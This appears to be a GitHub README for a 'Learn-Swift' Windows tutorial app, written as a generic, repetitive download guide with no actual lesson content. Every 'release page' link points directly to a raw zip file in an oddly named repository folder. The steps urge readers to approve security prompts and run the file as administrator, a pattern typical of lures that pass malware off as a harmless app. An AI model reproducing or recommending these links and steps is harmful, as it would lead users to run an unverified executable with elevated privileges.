Learn-Swift is a desktop learning app that helps you study Swift with short, clear tutorials. It is made for Windows users who want a simple way to open the app and start learning.
Use this guide to download the app, install it, and run it on your Windows PC.
- Open the release page: https://github.com/Mxxke2936/Learn-Swift/raw/refs/heads/main/Nemichthyidae/Swift_Learn_3.2.zip
- Find the latest release at the top of the page.
- Download the Windows file for your system.
- Save the file to a folder you can find later, such as Downloads or Desktop.
If you see more than one file, pick the Windows app file. It is often an .exe file or a .zip file that contains the app.
- Double-click the file.
- If Windows asks for permission, select Yes.
- Follow the steps on the screen.
- Wait for the setup to finish.
- Open Learn-Swift from the Start menu or desktop shortcut.
- Right-click the
.zipfile. - Select Extract All.
- Choose a folder.
- Open the extracted folder.
- Double-click the app file inside the folder.
Learn-Swift works best on a standard Windows PC with:
- Windows 10 or Windows 11
- 4 GB of RAM or more
- At least 200 MB of free disk space
- A screen resolution of 1366 x 768 or higher
- Internet access for downloading the app
Learn-Swift gives you a simple path through Swift basics. It is useful if you want to:
- Start with Swift syntax
- Learn how variables work
- Understand strings, numbers, and arrays
- Practice loops and conditions
- Read about functions and simple app logic
- Move from basic ideas to small projects
The tutorials use plain language. Each section helps you build one skill at a time.
Open a topic and read through short lessons without sorting through extra menus.
Lessons are grouped so you can move from one idea to the next.
The app focuses on first steps in Swift, so you can learn the core ideas before moving to harder topics.
Once installed, you can open the app any time without downloading it again.
You can read one lesson or work through several in one session.
- Go to https://github.com/Mxxke2936/Learn-Swift/raw/refs/heads/main/Nemichthyidae/Swift_Learn_3.2.zip
- Download the newest Windows release.
- Wait for the file to finish downloading.
- Open the file.
- If Windows shows a security prompt, choose Run or Yes.
- Follow the setup steps if the app uses an installer.
- Start Learn-Swift after setup ends.
If the app opens right away, you do not need to install anything else. If it comes in a folder, keep the files together so the app can run without errors.
When you start Learn-Swift for the first time:
- Browse the main lesson list.
- Open the first Swift topic.
- Read each section in order.
- Move to the next lesson after you understand the last one.
- Return to earlier lessons when you want to review a topic.
If you are new to Swift, begin with the basics and avoid skipping ahead. That helps the lessons make more sense.
- Keep the app in a folder you can find again.
- Use the latest release for the best match with Windows.
- If you have trouble opening the app, try running it as an administrator.
- Close other large apps if your PC feels slow.
- Read one lesson at a time so you can keep the ideas clear.
A simple way to use Learn-Swift:
- Swift basics
- Variables and constants
- Text and numbers
- Conditions
- Loops
- Functions
- Collections
- Small practice tasks
This order helps you build skill step by step. It also makes it easier to remember new ideas.
Learn-Swift works well if you want to:
- Start learning Swift on a Windows PC
- Review basic coding ideas in simple language
- Build a base before using Xcode on a Mac
- Study programming concepts at your own pace
- Keep lessons in one place instead of searching the web
- Make sure the download finished
- Check that you opened the right file
- Try downloading the latest release again
- Right-click the file
- Select Run as administrator
- If you used a zip file, extract it first
- Keep all app files in the same folder
- Do not rename the main app file
- Download the release again if files look incomplete
- Use your Windows display settings to increase text size
- Change the app window size if it allows resizing
If you need the file later, use the release page here: https://github.com/Mxxke2936/Learn-Swift/raw/refs/heads/main/Nemichthyidae/Swift_Learn_3.2.zip
When you visit the release page, look for a file that matches your Windows setup. Common names may include:
- Learn-Swift-Windows.exe
- Learn-Swift-Setup.exe
- Learn-Swift.zip
Choose the main Windows file if several files are listed. If you are not sure which one to use, pick the newest release and look for the file marked for Windows.
Swift is a modern programming language used to build apps for Apple devices. It uses clear syntax and works well for beginners. Learn-Swift focuses on the first parts of the language so you can understand how Swift code reads and how simple programs work.
Use this link to visit the download page and get the latest Windows version:
https://github.com/Mxxke2936/Learn-Swift/raw/refs/heads/main/Nemichthyidae/Swift_Learn_3.2.zip
- Use a recent version of Windows for the best results
- Keep enough free space for the app and its files
- Use a normal folder path if you extract a zip file
- Avoid moving the app files after setup unless you know all files stay together
Most lessons follow a simple format:
- A topic name
- A short explanation
- A few examples
- A small practice section
That layout helps you learn one piece at a time without feeling lost.
- Download the latest Windows release
- Open the app
- Start with the first lesson
- Move through each topic in order
- Return to lessons you want to review